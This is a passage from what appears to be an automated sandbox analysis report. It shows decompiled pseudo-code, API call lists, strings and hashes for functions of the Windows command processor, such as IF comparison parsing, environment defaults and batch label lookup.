                                                      							E4A73D23C(_t117, _t124,  *((intOrPtr*)(_t125 + 0x38)) + 0x2c, 1);
                                                      							_push(_t124);
                                                      							_push(_t117);
                                                      							_push( *((intOrPtr*)(_t125 + 0x40)));
                                                      							goto L8;
                                                      						}
                                                      						_t110 =  *(_t125 + 0x48);
                                                      						__eflags = _t110 & 0x00000001;
                                                      						if((_t110 & 0x00000001) == 0) {
                                                      							__eflags = _t110 & 0x00000002;
                                                      							if((_t110 & 0x00000002) == 0) {
                                                      								__eflags = _t110 & 0x00000008;
                                                      								if((_t110 & 0x00000008) == 0) {
                                                      									__eflags = _t110 & 0x00000004;
                                                      									if((_t110 & 0x00000004) == 0) {
                                                      										goto L33;
                                                      									}
                                                      									_push(1);
                                                      									_push(0x4a754608);
                                                      									L30:
                                                      									_push(_t124);
                                                      									_push(_t117);
                                                      									E4A73D23C();
                                                      									_t112 =  *(_t125 + 0x4c);
                                                      									__eflags = _t112;
                                                      									if(_t112 == 0) {
                                                      										goto L33;
                                                      									}
                                                      									_push(1);
                                                      									_push(_t112);
                                                      									goto L32;
                                                      								}
                                                      								_push(1);
                                                      								_push(0x4a754600);
                                                      								goto L30;
                                                      							} else {
                                                      								_push(1);
                                                      								_push(0x4a7545f8);
                                                      								goto L32;
                                                      							}
                                                      						} else {
                                                      							_push(1);
                                                      							_push(0x4a7545f0);
                                                      							L32:
                                                      							_push(_t124);
                                                      							_push(_t117);
                                                      							E4A73D23C();
                                                      							goto L33;
                                                      						}
                                                      					}
                                                      					__eflags = _t69 - 0x2c;
                                                      					if(_t69 == 0x2c) {
                                                      						goto L15;
                                                      					}
                                                      					__eflags = _t69 - 0x2d;
                                                      					if(__eflags == 0) {
                                                      						goto L3;
                                                      					}
                                                      					if(__eflags <= 0) {
                                                      						goto L14;
                                                      					}
                                                      					__eflags = _t69 - 0x33;
                                                      					if(_t69 <= 0x33) {
                                                      						goto L48;
                                                      					}
                                                      					goto L14;
                                                      				}
                                                      			}


                                                      APIs
                                                      • longjmp.MSVCRT(4A754AC0,000000FF,00000000,?,00002000,?,4A73D199,00000000,-00000003,00004000,-00000003,00004000, /D /c",?,?,4A73D126), ref: 4A7472EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: longjmp
                                                      • String ID: EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                      • API String ID: 1832741078-3035295614
                                                      • Opcode ID: 751d27c3dde4b7753abf13f7cb8b90117b4ab61ba78172fb39b65ce80ba696ef
                                                      • Instruction ID: 3b0e21debafd66667049b94a55bb53f8b45a17d49eaf952040628ee3a9ea5d4f
                                                      • Opcode Fuzzy Hash: 751d27c3dde4b7753abf13f7cb8b90117b4ab61ba78172fb39b65ce80ba696ef
                                                      • Instruction Fuzzy Hash: 7AA19AB011C645BAEBB05B50CC84E9B7F6AEB85710F12CC15FA01EE553C3B2E989D764
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E4A7386C9(long __ebx, char* __edi, void* __esi) {
                                                      				short _t13;
                                                      				short _t15;
                                                      				WCHAR* _t17;
                                                      				void* _t22;
                                                      				long _t26;
                                                      				void* _t28;
                                                      				short _t32;
                                                      				short* _t34;
                                                      				signed int _t39;
                                                      				WCHAR* _t41;
                                                      
                                                      				_t35 = __edi;
                                                      				_t26 = __ebx;
                                                      				_push(__ebx);
                                                      				_push(__edi);
                                                      				_t41 = E4A731896(0x208);
                                                      				if(_t41 == 0) {
                                                      					_push(1);
                                                      					E4A7372E9(_t28, __edi, _t41, __eflags);
                                                      					L9:
                                                      					E4A731730(_t35, E4A733AFC);
                                                      					L2:
                                                      					_t36 = L"PATHEXT";
                                                      					if(E4A732070(L"PATHEXT") == 0) {
                                                      						E4A731730(_t36, L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
                                                      					}
                                                      					_t37 = L"PROMPT";
                                                      					if(E4A732070(L"PROMPT") == 0) {
                                                      						E4A731730(_t37, L"$P$G");
                                                      					}
                                                      					if(E4A732070(L"COMSPEC") == 0) {
                                                      						_t13 = E4A7318EB(_t41, 0x2e);
                                                      						__eflags = _t13;
                                                      						if(_t13 != 0) {
                                                      							L18:
                                                      							E4A731730(L"COMSPEC", _t41);
                                                      							goto L5;
                                                      						}
                                                      						__imp___wcsupr( *0x4a770648);
                                                      						_t17 = _t41;
                                                      						_t1 =  &(_t17[1]); // 0x2
                                                      						_t34 = _t1;
                                                      						do {
                                                      							_t32 =  *_t17;
                                                      							_t17 =  &(_t17[1]);
                                                      							__eflags = _t32;
                                                      						} while (_t32 != 0);
                                                      						_t39 = _t17 - _t34 >> 1;
                                                      						_t22 = E4A732148(_t41,  *0x4a770664 & 0x0000ffff);
                                                      						_t3 = _t39 * 2; // -2
                                                      						__eflags = _t41 + _t3 - 2 - _t22;
                                                      						if(_t41 + _t3 - 2 == _t22) {
                                                      							_push( &M4A7549B6);
                                                      						} else {
                                                      							_push(L"\\CMD.EXE");
                                                      						}
                                                      						_push(_t26);
                                                      						_push(_t41);
                                                      						E4A7320A9(_t41);
                                                      						goto L18;
                                                      					} else {
                                                      						L5:
                                                      						_t15 = E4A732070(L"KEYS");
                                                      						if(_t15 != 0) {
                                                      							__imp___wcsicmp(_t15, 0x4a74bd54);
                                                      							__eflags = _t15;
                                                      							if(_t15 == 0) {
                                                      								 *0x4a7706bc = 1;
                                                      							}
                                                      						}
                                                      						return E4A737267(0x4a755260);
                                                      					}
                                                      				}
                                                      				_t26 = 0x104;
                                                      				GetModuleFileNameW(0, _t41, 0x104);
                                                      				_t35 = L"PATH";
                                                      				if(E4A732070(L"PATH") == 0) {
                                                      					goto L9;
                                                      				}
                                                      				goto L2;
                                                      			}


                                                      APIs
                                                        • Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
                                                        • Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0
                                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,4A755260,4A768640,00000104,4A73858C,4A755260,00000104,00000000,4A768640,00002000,00000000), ref: 4A7386EB
                                                        • Part of subcall function 4A732070: GetEnvironmentVariableW.KERNEL32(?,4A760640,00002000,75A9F670,?,?,4A73BEFF,00000000), ref: 4A73208E
                                                      • _wcsupr.MSVCRT ref: 4A746985
                                                      • _wcsicmp.MSVCRT ref: 4A7469E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$AllocEnvironmentFileModuleNameProcessVariable_wcsicmp_wcsupr
                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                      • API String ID: 4117198927-4197029667
                                                      • Opcode ID: f81a20440d6685598dd58e1b8e5f12a5ee33318ba3fc632af96dd70708a4a2a4
                                                      • Instruction ID: 1487f4a9b32b7accf7b2aa36aedf10e89fea7427a81acb644cab39f254ec4962
                                                      • Opcode Fuzzy Hash: f81a20440d6685598dd58e1b8e5f12a5ee33318ba3fc632af96dd70708a4a2a4
                                                      • Instruction Fuzzy Hash: 8821E16120E91375A6702365CD88EFF1B6A9FD16A2B030018FA41DD843EBACD90DC7A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 25%
                                                      			E4A731605() {
                                                      				int _t7;
                                                      				signed int _t8;
                                                      				signed int _t10;
                                                      				signed int _t14;
                                                      				intOrPtr* _t27;
                                                      
                                                      				_t27 = __imp___get_osfhandle;
                                                      				SetConsoleMode( *_t27( *0x4a7541ac), 1);
                                                      				_push(0x4a7541ac);
                                                      				if(GetConsoleMode( *_t27(), 1) != 0) {
                                                      					_t14 =  *0x4a7541ac; // 0x0
                                                      					if((_t14 & 0x00000003) != 3) {
                                                      						 *0x4a7541ac =  *0x4a7541ac | 0x00000003;
                                                      						SetConsoleMode( *_t27( *0x4a7541ac), 1);
                                                      					}
                                                      				}
                                                      				_t7 = GetConsoleMode( *_t27(0x4a7541b0), 0);
                                                      				if(_t7 == 0) {
                                                      					L7:
                                                      					return _t7;
                                                      				} else {
                                                      					_t8 =  *0x4a7541b0; // 0x0
                                                      					if((_t8 & 0x00000007) != 7 || (_t8 & 0x00000010) != 0) {
                                                      						_t10 = _t8 & 0xffffffef | 0x00000007;
                                                      						 *0x4a7541b0 = _t10;
                                                      						SetConsoleMode( *_t27(_t10), 0);
                                                      					}
                                                      					_t7 =  *0x4a7541f4; // 0x0
                                                      					if(_t7 == 0) {
                                                      						goto L7;
                                                      					} else {
                                                      						return  *_t7(L"CMD.EXE");
                                                      					}
                                                      				}
                                                      			}









                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ConsoleMode_get_osfhandle
                                                      • String ID: CMD.EXE
                                                      • API String ID: 1606018815-3025314500
                                                      • Opcode ID: 0586598abc18660c383b2b9b64db99dd90e236fe1572be3ff0c4e91ea6b2832a
                                                      • Instruction ID: 3bdf965fbbfb45253a4e462e9e816a3c438c471fa9128f05c5765f7dfea3b6da
                                                      • Opcode Fuzzy Hash: 0586598abc18660c383b2b9b64db99dd90e236fe1572be3ff0c4e91ea6b2832a
                                                      • Instruction Fuzzy Hash: 881186B3ED5625AEFE3067F5DC16F662FBDD7922A0F060416E201C6881DEA5DC04CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 4A7379E8
                                                      • HeapAlloc.KERNEL32(00000000), ref: 4A7379F1
                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 4A737A05
                                                      • HeapAlloc.KERNEL32(00000000), ref: 4A737A08
                                                      • _wcsicmp.MSVCRT ref: 4A737AA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$AllocProcess$_wcsicmp
                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                      • API String ID: 3463597064-3086019870
                                                      • Opcode ID: e0c16eab2e8cf020e16ba0685142f173d04d13243c1a5e5f25f21b9167f1be6f
                                                      • Instruction ID: 7da51cf8ad767c797c13eb494ea3d58caa5e4e1892be22d01df29c88d0055471
                                                      • Opcode Fuzzy Hash: e0c16eab2e8cf020e16ba0685142f173d04d13243c1a5e5f25f21b9167f1be6f
                                                      • Instruction Fuzzy Hash: CF4116B264C612AFE374DF68C8419563FFDEB46310B120469E645CBA43EB24DE08DB25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E4A736262(void* __eflags, intOrPtr* _a4) {
                                                      				intOrPtr _t15;
                                                      				intOrPtr* _t18;
                                                      				intOrPtr _t19;
                                                      				intOrPtr _t20;
                                                      				intOrPtr* _t32;
                                                      				intOrPtr* _t33;
                                                      				intOrPtr _t46;
                                                      				intOrPtr _t48;
                                                      				intOrPtr _t49;
                                                      				void* _t51;
                                                      				intOrPtr* _t52;
                                                      
                                                      				_t15 = E4A733D56(0);
                                                      				_t32 = _a4;
                                                      				_t51 = 4;
                                                      				 *((intOrPtr*)(_t32 + 0x38)) = _t15;
                                                      				if(E4A731CBF(_t51) != 0x4000) {
                                                      					E4A74EE72();
                                                      				}
                                                      				_t33 = E4A736304;
                                                      				_t18 = 0x4a768640;
                                                      				while(1) {
                                                      					_t48 =  *_t18;
                                                      					if(_t48 !=  *_t33) {
                                                      						break;
                                                      					}
                                                      					if(_t48 == 0) {
                                                      						L14:
                                                      						_t18 = 0;
                                                      						L5:
                                                      						if(_t18 == 0) {
                                                      							L1:
                                                      							_t19 = E4A733D56(0);
                                                      							 *((intOrPtr*)(_t32 + 0x3c)) = _t19;
                                                      							return _t19;
                                                      						}
                                                      						_t20 =  *0x4a754178; // 0x0
                                                      						if(_t20 >= _t51 &&  *0x4a768640 == 0x3d &&  *0x4a768642 == 0x3d) {
                                                      							 *((intOrPtr*)(_t32 + 0x3c)) = E4A732041(_t20 + _t20 - 4);
                                                      							_t46 =  *0x4a754178; // 0x0
                                                      							return E4A73185A(_t30, _t46 + 0xfffffffe, 0x4a768644);
                                                      						}
                                                      						if( *0x4a754081 == 0) {
                                                      							return E4A74EE72();
                                                      						} else {
                                                      							_t52 = __imp___wcsicmp;
                                                      							_push("EQU");
                                                      							_push(0x4a768640);
                                                      							if( *_t52() == 0) {
                                                      								 *((intOrPtr*)(_t32 + 0x44)) = 1;
                                                      							} else {
                                                      								_push("NEQ");
                                                      								_push(0x4a768640);
                                                      								if( *_t52() == 0) {
                                                      									 *((intOrPtr*)(_t32 + 0x44)) = 2;
                                                      								} else {
                                                      									_push("LSS");
                                                      									_push(0x4a768640);
                                                      									if( *_t52() == 0) {
                                                      										 *((intOrPtr*)(_t32 + 0x44)) = 3;
                                                      									} else {
                                                      										_push("LEQ");
                                                      										_push(0x4a768640);
                                                      										if( *_t52() == 0) {
                                                      											 *((intOrPtr*)(_t32 + 0x44)) = 4;
                                                      										} else {
                                                      											_push("GTR");
                                                      											_push(0x4a768640);
                                                      											if( *_t52() != 0) {
                                                      												_push("GEQ");
                                                      												_push(0x4a768640);
                                                      												if( *_t52() != 0) {
                                                      													E4A74EE72();
                                                      												} else {
                                                      													 *((intOrPtr*)(_t32 + 0x44)) = 6;
                                                      												}
                                                      											} else {
                                                      												 *((intOrPtr*)(_t32 + 0x44)) = 5;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							 *_t32 = 0x3a;
                                                      							goto L1;
                                                      						}
                                                      					}
                                                      					_t49 =  *((intOrPtr*)(_t18 + 2));
                                                      					_t8 = _t33 + 2; // 0x3d
                                                      					if(_t49 !=  *_t8) {
                                                      						break;
                                                      					}
                                                      					_t18 = _t18 + _t51;
                                                      					_t33 = _t33 + _t51;
                                                      					if(_t49 != 0) {
                                                      						continue;
                                                      					}
                                                      					goto L14;
                                                      				}
                                                      				asm("sbb eax, eax");
                                                      				asm("sbb eax, 0xffffffff");
                                                      				goto L5;
                                                      			}















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                      • API String ID: 0-3124875276
                                                      • Opcode ID: 8e7d65a66348eb5cde589623655a034a470fae4b6408a02629212160d181f506
                                                      • Instruction ID: 401a9e84bc9d075f27c8bdcf25959e8d5b906884143ef6f8033b277e8a6ed8bb
                                                      • Opcode Fuzzy Hash: 8e7d65a66348eb5cde589623655a034a470fae4b6408a02629212160d181f506
                                                      • Instruction Fuzzy Hash: 133145B121CA12A6E7B49BA1DD84B977FA8DB426B0F03841BD600CE183FB75C84CC711
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 31%
                                                      			E4A736447(void* __edx, LONG* _a4) {
                                                      				signed int _v8;
                                                      				char _v264;
                                                      				char _v520;
                                                      				long _v524;
                                                      				int _v528;
                                                      				short* _v532;
                                                      				int _v536;
                                                      				int _v540;
                                                      				long _v544;
                                                      				LONG* _v548;
                                                      				short* _v552;
                                                      				signed int _v556;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t58;
                                                      				void* _t70;
                                                      				void* _t74;
                                                      				void* _t77;
                                                      				short* _t84;
                                                      				short* _t85;
                                                      				void* _t86;
                                                      				char* _t91;
                                                      				void* _t99;
                                                      				long _t102;
                                                      				void* _t111;
                                                      				int _t117;
                                                      				void* _t121;
                                                      				intOrPtr _t122;
                                                      				intOrPtr* _t124;
                                                      				short* _t126;
                                                      				int _t135;
                                                      				signed int _t136;
                                                      				void* _t137;
                                                      				intOrPtr _t142;
                                                      
                                                      				_t121 = __edx;
                                                      				_t58 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t58 ^ _t136;
                                                      				_t123 = _a4;
                                                      				_t122 =  *0x4a7540b4; // 0x0
                                                      				_t61 = 1;
                                                      				_v548 = _t123;
                                                      				_v536 = 1;
                                                      				_v540 = 0;
                                                      				if(_t122 == 0) {
                                                      					L8:
                                                      					return E4A7313A9(_t61, 0, _v8 ^ _t136, _t121, _t122, _t123);
                                                      				}
                                                      				_t107 = _t123[0xf];
                                                      				if(_t123[0xf] == 0) {
                                                      					E4A7357F4(1, _t122);
                                                      					_push(0);
                                                      					_push(0x2330);
                                                      					 *0x4a7540b4 =  *((intOrPtr*)(_t122 + 0x110));
                                                      					E4A736D44(_t107);
                                                      					L38:
                                                      					_t61 = 1;
                                                      					goto L8;
                                                      				}
                                                      				E4A73654D(_t107,  &_v264, 0x80, 1);
                                                      				_v556 =  *(_t122 + 8);
                                                      				_t70 = E4A734D4E(_t122);
                                                      				_v524 = _t70;
                                                      				if(_t70 == 0xffffffff) {
                                                      					goto L38;
                                                      				}
                                                      				__imp___get_osfhandle(0);
                                                      				_v544 = GetFileSize(_t70, _t70);
                                                      				_t72 = E4A732B0D(_t123[0xf], 0);
                                                      				_t123 = _t72;
                                                      				_t142 =  *0x4a754081; // 0x0
                                                      				if(_t142 == 0) {
                                                      					while(1) {
                                                      						L22:
                                                      						E4A734B2A(_t72);
                                                      						_t124 = __imp___get_osfhandle;
                                                      						_t74 =  *_t124(_v524, 0, 0, 1);
                                                      						_pop(_t111);
                                                      						_t75 = SetFilePointer(_t74, ??, ??, ??);
                                                      						 *(_t122 + 8) = _t75;
                                                      						if(_t75 >= _v556 && _v536 == 0) {
                                                      							break;
                                                      						}
                                                      						_t77 =  *_t124(_v524, 0x4a768640, 0x200,  &_v528);
                                                      						_pop(_t111);
                                                      						_push(_t77);
                                                      						if(E4A7367D3() == 0) {
                                                      							break;
                                                      						}
                                                      						_t75 = _v528;
                                                      						if(_t75 == 0) {
                                                      							L32:
                                                      							if(_v536 == 0) {
                                                      								L39:
                                                      								E4A7357F4(_t75, _t122);
                                                      								 *0x4a7540b4 =  *((intOrPtr*)(_t122 + 0x110));
                                                      								_t123 = 1;
                                                      								E4A736D44(_t111, 0x400023ab, 1,  &_v264);
                                                      								_v540 = 1;
                                                      								L7:
                                                      								E4A733AB3(_v524);
                                                      								_t61 = _v540;
                                                      								goto L8;
                                                      							}
                                                      							_t72 = SetFilePointer( *_t124(0), _v524, 0, 0);
                                                      							_v536 = 0;
                                                      							continue;
                                                      						}
                                                      						if(_t75 == 0xffffffff ||  *0x4a768640 == 0 || _v264 == 0) {
                                                      							break;
                                                      						} else {
                                                      							0x4a768640[_t75] = 0;
                                                      							_t126 = E4A7318EB(0x4a768640, 0x3a);
                                                      							if(_t126 == 0) {
                                                      								continue;
                                                      							} else {
                                                      								goto L30;
                                                      							}
                                                      							do {
                                                      								L30:
                                                      								_t84 = _t126;
                                                      								while(1) {
                                                      									_v532 = _t84;
                                                      									if( *_t84 == 0xa) {
                                                      										break;
                                                      									}
                                                      									if(_t84 == 0x4a768640) {
                                                      										break;
                                                      									}
                                                      									_t84 = _t84;
                                                      								}
                                                      								if( *_t84 != 0x3a) {
                                                      									_v532 = _t84;
                                                      								}
                                                      								_t85 = E4A732B0D(_t84, 0);
                                                      								_v552 = _t85;
                                                      								if( *_t85 == 0x3a) {
                                                      									_t86 = E4A7318EB(_v532, 0xa);
                                                      									_t123 = _t86;
                                                      									if(_t123 == 0) {
                                                      										__imp___get_osfhandle(1);
                                                      										if(SetFilePointer(_t86, _v524, 0, 0) == _v544) {
                                                      											goto L10;
                                                      										}
                                                      										_t117 = _v528;
                                                      										if(_t117 == 0x200) {
                                                      											goto L10;
                                                      										}
                                                      										_t135 = _t117 - (_v532 - 0x4a768640 >> 1);
                                                      										_t99 = E4A73661C();
                                                      										if(_t99 != 0) {
                                                      											_t99 = WideCharToMultiByte( *0x4a7541b8, 0, 0x4a768640, _t135, 0, 0, 0, 0);
                                                      											_t135 = _t99;
                                                      										}
                                                      										_t123 =  ~_t135;
                                                      										__imp___get_osfhandle(1);
                                                      										_t72 = SetFilePointer(_t99, _v524,  ~_t135, 0);
                                                      										break;
                                                      									}
                                                      									L10:
                                                      									E4A73654D(_v552,  &_v520, 0x80, 0);
                                                      									_t91 =  &_v264;
                                                      									__imp___wcsicmp(_t91,  &_v520);
                                                      									if(_t91 != 0) {
                                                      										goto L20;
                                                      									}
                                                      									 *0x4a7540b8 = _v548[0x10] & 0x00000001;
                                                      									_t72 = E4A73661C();
                                                      									if(_t123 == 0) {
                                                      										if(_t72 == 0) {
                                                      											_t72 = _v528;
                                                      											L50:
                                                      											 *(_t122 + 8) =  *(_t122 + 8) + _t72;
                                                      											break;
                                                      										}
                                                      										_push(0);
                                                      										_push(0);
                                                      										_push(0);
                                                      										_push(0);
                                                      										_push(_v528);
                                                      										_push(0x4a768640);
                                                      										L49:
                                                      										_t72 = WideCharToMultiByte( *0x4a7541b8, 0, ??, ??, ??, ??, ??, ??);
                                                      										goto L50;
                                                      									}
                                                      									if(_t72 != 0) {
                                                      										_push(0);
                                                      										_push(0);
                                                      										_push(0);
                                                      										_push(0);
                                                      										_push(_t123);
                                                      										_push(0x4a768640);
                                                      										goto L49;
                                                      									}
                                                      									 *(_t122 + 8) = _t123 +  *(_t122 + 8);
                                                      									break;
                                                      								}
                                                      								L20:
                                                      								_t126 = E4A7318EB(_t123, 0x3a);
                                                      							} while (_t126 != 0);
                                                      							if( *0x4a7540b8 == 1) {
                                                      								goto L7;
                                                      							}
                                                      							continue;
                                                      						}
                                                      					}
                                                      					if(_v528 != 0) {
                                                      						goto L39;
                                                      					}
                                                      					goto L32;
                                                      				}
                                                      				__imp___wcsnicmp(_t123, L":EOF", 4);
                                                      				_t137 = _t137 + 0xc;
                                                      				if(_t72 != 0) {
                                                      					goto L22;
                                                      				}
                                                      				_t102 = _t123[2] & 0x0000ffff;
                                                      				if(_t102 != 0) {
                                                      					if(iswspace(_t102) != 0) {
                                                      						goto L6;
                                                      					}
                                                      					goto L22;
                                                      				}
                                                      				L6:
                                                      				 *(_t122 + 8) = _v544;
                                                      				 *0x4a7540b8 = 1;
                                                      				goto L7;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 4A734D4E: _get_osfhandle.MSVCRT ref: 4A734D79
                                                        • Part of subcall function 4A734D4E: SetFilePointer.KERNEL32(00000000,4A734C54,00000000,00000000,00000104,00000000,00000114), ref: 4A734D81
                                                      • _get_osfhandle.MSVCRT ref: 4A7364C5
                                                      • GetFileSize.KERNEL32(00000000), ref: 4A7364CD
                                                        • Part of subcall function 4A732B0D: iswspace.MSVCRT ref: 4A732B1F
                                                      • _wcsnicmp.MSVCRT ref: 4A7364F8
                                                      • _get_osfhandle.MSVCRT ref: 4A73672B
                                                      • SetFilePointer.KERNEL32(00000000), ref: 4A73672F
                                                      • _get_osfhandle.MSVCRT ref: 4A736763
                                                      • iswspace.MSVCRT ref: 4A73F6C8
                                                        • Part of subcall function 4A733AB3: _close.MSVCRT ref: 4A733AED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _get_osfhandle$File$Pointeriswspace$Size_close_wcsnicmp
                                                      • String ID: :EOF
                                                      • API String ID: 2298062502-551370653
                                                      • Opcode ID: b975329302cabd82a2c5688ad9ed687d60e9f142877efa690db85bdcc5fb59ed
                                                      • Instruction ID: 5c265b5273fe7fc8b416e5ba05451495d9c3250c64864fa0a207b7ad20a0fcae
                                                      • Opcode Fuzzy Hash: b975329302cabd82a2c5688ad9ed687d60e9f142877efa690db85bdcc5fb59ed
                                                      • Instruction Fuzzy Hash: 175106B1909629AFDF709F60CDC8AEEBBBDEB05350F1201A5E505DB542DB309E88CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E4A736A35(void* __ebx, void* __ecx, void* __edx, WCHAR* _a4) {
                                                      				signed int _v8;
                                                      				char _v1040;
                                                      				intOrPtr _v1042;
                                                      				short _v1044;
                                                      				short _v1046;
                                                      				short _v1048;
                                                      				char _v1640;
                                                      				WCHAR* _v1644;
                                                      				char _v1648;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t24;
                                                      				signed int _t26;
                                                      				wchar_t* _t34;
                                                      				wchar_t* _t35;
                                                      				signed int _t36;
                                                      				short* _t41;
                                                      				void* _t51;
                                                      				signed int _t57;
                                                      				void* _t61;
                                                      				WCHAR* _t62;
                                                      				void* _t63;
                                                      				signed int _t64;
                                                      				signed int _t67;
                                                      
                                                      				_t61 = __edx;
                                                      				_t51 = __ebx;
                                                      				_t24 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t24 ^ _t67;
                                                      				_t62 = _a4;
                                                      				if(_t62 == 0) {
                                                      					_t26 = 0;
                                                      					L8:
                                                      					return E4A7313A9(_t26, _t51, _v8 ^ _t67, _t61, _t62, _t63);
                                                      				}
                                                      				_push(_t63);
                                                      				_t64 = GetFullPathNameW(E4A732598(__ecx, _t62), 0x208,  &_v1048,  &_v1644);
                                                      				if(_t64 == 0) {
                                                      					L6:
                                                      					_t26 = _t64;
                                                      					L7:
                                                      					_pop(_t63);
                                                      					goto L8;
                                                      				}
                                                      				if(wcsncmp( &_v1048, L"\\\\.\\", 4) == 0) {
                                                      					_t34 =  &_v1040;
                                                      					_v1644 = _t34;
                                                      					_t35 = wcsstr(_t62, _t34);
                                                      					_v1644 = _t35;
                                                      					if(_t35 == 0 || _t35 <= _t62) {
                                                      						_t36 = GetFileAttributesW(_t62);
                                                      						_t57 = _t36;
                                                      					} else {
                                                      						 *_t35 = 0;
                                                      						_t57 = GetFileAttributesW(_t62);
                                                      						 *_v1644 =  *_t35 & 0x0000ffff;
                                                      						_t36 = _t57;
                                                      					}
                                                      					asm("sbb eax, eax");
                                                      					_t26 =  ~(_t36 + 1) & _t57;
                                                      					goto L7;
                                                      				}
                                                      				_t41 = _v1644;
                                                      				if(_t41 == 0 ||  *_t41 == 0) {
                                                      					_t64 = 0 | GetFileAttributesW( &_v1048) != 0xffffffff;
                                                      				} else {
                                                      					_t64 = E4A733117( &_v1048, 0x37,  &_v1640,  &_v1648) & 0x000000ff;
                                                      					E4A732F5C(_v1648);
                                                      					if(_t64 == 0) {
                                                      						if(_v1046 == 0x5c || _v1046 == 0x3a && _v1044 == 0x5c && _v1042 == _t64) {
                                                      							if(GetDriveTypeW( &_v1048) <= 1) {
                                                      								goto L6;
                                                      							}
                                                      							_t64 = 1;
                                                      						}
                                                      					}
                                                      				}
                                                      			}




























                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(00000000,?,00000208,?,?), ref: 4A736A71
                                                      • wcsncmp.MSVCRT(?,\\.\,00000004), ref: 4A736A8B
                                                      • GetDriveTypeW.KERNEL32(?,?,?,00000037,?,?), ref: 4A736B37
                                                      • wcsstr.MSVCRT ref: 4A749DCB
                                                      • GetFileAttributesW.KERNEL32(?), ref: 4A749DEA
                                                      • GetFileAttributesW.KERNEL32(?), ref: 4A749E23
                                                        • Part of subcall function 4A732F5C: FindClose.KERNEL32(4A754210,?,4A7495B1,?,00000000,00000000,?,4A74FCAB,4A743723,4A76C642,4A731BBC,4A76C642,00002002,4A75C640,00000000,00000000), ref: 4A732F96
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: AttributesFile$CloseDriveFindFullNamePathTypewcsncmpwcsstr
                                                      • String ID: :$\$\\.\
                                                      • API String ID: 3324058816-2289549094
                                                      • Opcode ID: 02d7fd9f7c8b15fb8e9343e725c2523b30da5a6ad1f66af62416f191afaba84d
                                                      • Instruction ID: 8dd089adc61da876357b1ad82b2c703c6262b6507cb1854f4e59c8a72548badc
                                                      • Opcode Fuzzy Hash: 02d7fd9f7c8b15fb8e9343e725c2523b30da5a6ad1f66af62416f191afaba84d
                                                      • Instruction Fuzzy Hash: 2E41D6B2D05528DBCF708B64CC85AEB7BBCAF45310F1241A6E505D7142EB71CE88CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
